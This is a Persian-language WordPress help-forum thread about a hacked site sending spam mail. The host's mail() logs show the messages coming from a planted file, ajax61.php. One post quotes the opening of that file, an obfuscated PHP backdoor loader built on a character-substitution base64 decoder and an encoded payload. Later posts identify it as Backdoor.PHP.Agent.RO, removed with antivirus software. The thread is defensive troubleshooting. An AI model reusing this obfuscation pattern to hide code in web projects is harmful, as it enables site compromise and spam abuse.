hiwa

مشکل امنیتی در مورد ارسال ایمیل ناخواسته از سایت + جزئیات خطا

5 پست در این موضوع قرار دارد

ارسال شده در (ویرایش شده)

سلام دوستان

من یک هفته است درگیر یک مشکل امنیتی در سایت وردپرسم هستم ممنون میشم اگه وقت بگذارید نظرتون رو بگید تا بتونم بررسی های بیشتری داشته باشم.

متن خطایی که کارشناس هاست برای من ارسال کرده اینه:

لینک های مربوط به صفحات و کدهای آلوده در سایت شما به شرح ذیل ارائه می گردد : 


[27-Dec-2016 20:48:46 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: manclik@o2.pl -- Headers: Date: Tue, 27 Dec 2016 20:48:46 -0500 From: Adrianna <adrianna@mydomain.com> Message-ID: <e086de42938f51715a6c6f5e2440922a@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_e086de42938f51715a6c6f5e2440922a" Content-Transfer-Encoding: 8bit


[28-Dec-2016 03:32:25 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: panos@spitfire.gr -- Headers: Date: Wed, 28 Dec 2016 03:32:25 -0500 From: Debbie <debbie@mydomain.com> Message-ID: <f69af4c19b6af26f68341250901069ed@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_f69af4c19b6af26f68341250901069ed" Content-Transfer-Encoding: 8bit

قالبی که استفاده کردم listify نام داره . از سایت nikan خریداری کردم (250 هزار)

دو سه روز کامل درگیر اسکن و بررسی بودم و دوباره فایل های اسکن شده رو روی هاست(ویندوزی) پاک شده آپلود کردم اما باز هم همان مشکل قبلی پیش آمد.

سیستم خودم رو فول اسکن کردم.

تمام فایلهای سایت رو هم دانلود اسکن کردم. موارد مشکوک رو fix کردم با آنتی ویرویس avast Free اما مشکلم حل نشده.

راهکاری به نظرتون میرسه ؟

ممنون

ویرایش شده در توسط hiwa
1

به اشتراک گذاری این پست


لینک به پست

محتوای فایل ajax61.php هم به این شکله :

<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

0

به اشتراک گذاری این پست


لینک به پست
در 5 ساعت قبل، hiwa گفته است :

محتوای فایل ajax61.php هم به این شکله :


<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

درود بر شما بنده زیاد ازین کدها سر در نیاوردم ولی تا جایی که متوجه شدم اول اینکه شما دارین از هاست ویندوز استفاده میکنین که این زیاد با وردپرس همخوانی نداره و عمده مشکلاتتون دقیقا از اینجا شروع میشه!

بعدش اینکه فک میکنم یه کد مخرب بصورت رمزگذاری شده همون متن سبز رنگ در یکی از ابزارکهای قالب وجود داره!

که اول باید دیکد بشه و بعدا که متوجه شدین چی هست حذف بشه!

یا اون بخش از کدها رو حدف کنید و ببینید مشکل بر طرف میشه یا بازم وجود داره!

فک میکنم این موارد رو چک کنید مشکلتون برطرف بشه اگر نشد بازم پیام بزاردی فرصتی داشتم خدمت میرسم و بازم چک میکنیم با هم

^_^

1

به اشتراک گذاری این پست


لینک به پست

دوستت عزیز خیلی متشکرم از جوابت. مواردی که گفتی رو دارم انجام میدم. امیدوارم حل بشه. نتیجه رو حتما خدمتت گزارش میدم. بازم ممنونم ازت.

0

به اشتراک گذاری این پست


لینک به پست

مشکل من یک بک دور به اسم Backdoor.PHP.Agent.RO  بود که به کمک Bitdefender total security 2017 تونستم مشکل رو حل کنم.

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط عمارگراف
      سلام
      وقتتون بخیر
      داشتم با سایت کار میکردم. مشکلی هم نبود. آخرین پلاگینی که نصب کردم افزونه پست پیشتاز و سفارشی بود. بعد از نصب افزونه هم چند دقیقه با سایت کار کردم مشکلی نداشت.
      اما یهو صفحه سفید شد. به هیچ صفحه ای دیگه دسترسی ندارم. نه مدیریت نه فروشگاه.
      مدام هم داره رفرش میشه.
      دیباگ وردپرس رو هم فعال کردم اما چیزی نیشون نمیده.
      پوشه پلاگین ها رو تغییر نام دادم اما اتفاقی نیوفتاد.
      پوشه پوسته اصلی سایت رو هم تغییر نام دادم اما درست نشد.
      لطفاً راهنمایی کنید.
      یا علی
      آدرس سایت : http://bonyadtarikhbook.ir/
       
      **به روز رسانی **
      در حین نوشتن این تاپیک بودم که سایت خود به خود بالا اومد! :|
      نمیدونم مشکل از کجاست اما قاعدتاً دوباره اتفاق میوفته. چون این بار هم من درستش نکردم. ممنون میشم دوستان از تجربیاتشون بهم بگن که ووکامرس چه مشکلاتی ممکنه داشته باشه.
      الآن هم سایت رو ببینید، دیباگ رو خاموش نکردم که دوستان ارورها رو ببینن.
      بازم ممنون
    • توسط Hamedgh
      سلام 
      من میخوام بخش دیگری رو به وبسایت الحاق کنم 
      از بین ساب فولدر و ساب دامین بنابر همگونی سایت اصلی با سایت روی ساب فولدر در رنکینگ ؛ موتورهای جستجو و سئو نسبت به ساب دامین میخوام وردپرس دومم رو روی ساب فولدر نصب کنم 
      الان یک ساب دامین ساختم و در document root  مسیر public_html/fanous براش نوشتم 
      الان وردپرس رو در پوشه fanous در مسیر public_html قرار بدم و نصب کنم؟ برای سایت اصلی مشکلی پیش نمیاد ؟ 
    • توسط shahrzad
      سلام 
      برای من مشکلی پیش آمده که اگر کمکم کنید حلش کنم ممنون میشوم.
       بعد از بروز رسانی قالب وبسایتم، دیگر کامپوننت های جاوااسکریپتی اجرا نمیشوند و حتی در سورس کد نمی آیند. مثلا پلاگین ulike دیگر نمیتوان لایک کرد. 
      آدرس سایت shahinkalantari.com 
      پ.ن: با جستجو در پرسشهای قبلی دیدم که کسی مشکلی مانند مسئله من داشته است. راه حلی که به ایشان ارائه شده بود را امتحان کردم اما جواب نگرفتم. 
    • توسط Pluto65
      سلام
      وردپرس 4.8.1 دارم و افزونه پارسی دیت را نصب کرده ام.این افزونه، ابزارکی به نام "بایگانی تاریخ خورشیدی" دارد که تاریخ را به شمسی تبدیل می کند اما فونت نمایش اعداد در آن با فونت اصلی سایت منطبق و هماهنگ نیست.
      برای سایت از فونت "یکان" استفاده کرده ام و در تمام سایت این فونت اعمال شده اما در این ابزارک اعمال نمی شود.
      لازم به ذکر است با افزونه جلالی هم تست کردم و همین مشکل در آن جا هم وجود داشت.
       
      برای حل مشکل، راهنمایی بفرمایید .

    • توسط jistili1
      سلام دوستان.من میخوام افزونه ajax search lite رو که برای جستجوی پیشرفته در سایت هستش ، یکمی از لحاظ ظاهری ویرایش کنم.مثلا فونت متنی که برای جستجو کاربر وارد میکنه رو بزرگتر کنم یا طول کادر وارد کردن متن جستجو رو بزرگ و کوچیک کنم.ممنون میشم راهنمائیم کنید چطوری این کار رو بکنم.